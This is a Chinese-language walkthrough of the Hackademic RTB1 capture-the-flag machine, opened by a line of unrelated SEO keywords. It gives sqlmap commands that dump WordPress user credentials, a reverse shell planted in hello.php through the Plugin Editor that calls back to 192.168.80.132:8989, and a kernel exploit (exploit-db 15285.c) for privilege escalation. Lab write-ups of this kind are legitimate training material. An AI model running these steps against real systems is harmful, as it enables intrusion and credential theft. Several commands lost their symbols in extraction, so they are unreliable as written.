跳转到手机网站代码,网站单选框的实现,网站优化软件有哪些,wordpress下载页源码系列#xff1a;Hackademic#xff08;此系列共2台#xff09; 难度#xff1a;初级 信息收集
主机发现
netdiscover -r 192.168.80.0/24端口扫描
nmap -A -p- 192.168.80.143访问80端口 使用指纹识别插件查看是WordPress 根据首页显示的内容#xff0c;点击target 点击… 系列Hackademic此系列共2台 难度初级 信息收集
主机发现
netdiscover -r 192.168.80.0/24端口扫描
nmap -A -p- 192.168.80.143访问80端口 使用指纹识别插件查看是WordPress 根据首页显示的内容点击target 点击 页面能点击的链接发现点击Uncategorized的时候链接变成了
http://192.168.80.143/Hackademic_RTB1/?cat1尝试有无SQL注入在?cat1后加上发现有SQL语句的报错信息可以判断有SQL注入漏洞 目录扫描
单纯的爆破IP地址扫描不出有用的目录信息
dirsearch -u http://192.168.80.143 -i 200 开始是直接扫了IP现在多了一个目录/Hackademic_RTB1/那么直接扫该目录
dirsearch -u http://192.168.80.143/Hackademic_RTB1/ -i 200漏洞利用
sqlmap
查看都有哪些数据库
sqlmap -u 192.168.80.143/Hackademic_RTB1/?cat1 --dbs --batch 获取所有表
sqlmap -u 192.168.80.143/Hackademic_RTB1/?cat1 -D wordpress --tables --batch获取该表的所有字段
sqlmap -u 192.168.80.143/Hackademic_RTB1/?cat1 -D wordpress -T wp_users --columns --batch 获取想要的数据
sqlmap -u 192.168.80.143/Hackademic_RTB1/?cat1 -D wordpress -T wp_users -C user_login,user_pass --dump登录后台192.168.80.143/Hackademic_RTB1/wp-admin/ 使用一个用户密码登录 NickJames密码admin 登上 之后没有什么能够 利用的尝试换一个用户登录看看
用户:GeorgeMiller密码q1w2e3发现在Plugins选项里有一个Plugin Editor编辑的地址加入反弹shell
system(bash -c sh -i /dev/tcp/192.168.80.132/8989 01);kali开启监听
nc -lvvp 8989提交之后就得要知道上文的 路径找出路径才能触发反弹shell 找到提交路径方式一 wordpress上传的文件默认是存储在目录/wp-content/uploads中Uploads文件夹中包括所有你上传的图片视频和附件。 WordPress文件夹内你会发现大量的代码文件和3个文件夹**wp-admin wp-content wp-includes** wp-admin 没错这是你的仪表板你登陆wordpress后看到的界面包括所有的后台文件 wp-content包含你所有的内容包括插件 主题和您上传的内容 Plugins文件夹包含所有插件。 每个插件都有一个自己的文件夹。 如Aksimet坐在Akismet在文件夹内 同样theme主题文件夹保存你所有的主题。 插件一样每个主题有单独的文件夹。 Uploads文件夹所有你上传图片视频和附件。 languages是关于语言的 wp-includes包括持有的所有文件和库是必要的WordPress管理编辑和JavaScript库CSS和图像fiels 在爆破目录的时候发现有一个wp-content目录可以访问一下看看 页面显示如下
http://192.168.80.143/Hackademic_RTB1/wp-content/ 刚在又是在Plugins选项里的Plugin Editor编辑的反弹shell刚在Plugin Editor编辑页面也显示了说正在编辑hello.php 所以在http://192.168.80.143/Hackademic_RTB1/wp-content/页面中点击plugins 就看到了hello.php点击hello.php触发反弹shell 耐心等待----------------- 内核提权
查看内核版本
uname -a新开一个终端搜索该版本的漏洞
searchsploit 2.6.3 | grep Local Privilege Escalation查看完整路径
searchsploit -p linux/local/15285.c 把这个15285.c复制到apache服务的根路径/var/www/html下
sudo cp /usr/share/exploitdb/exploits/linux/local/15285.c /var/www/html/15285.c启动apache服务
systemctl restart apache2.servicegcc 15285.c -o exp# 将15285.c预处理、汇编、编译并链接形成可执行文件exp#-o选项用来指定输出文件的文件名将15285.c预处理、汇编、编译并链接形成可执行文件exp。
-o选项用来指定输出文件的文件名 闯关成功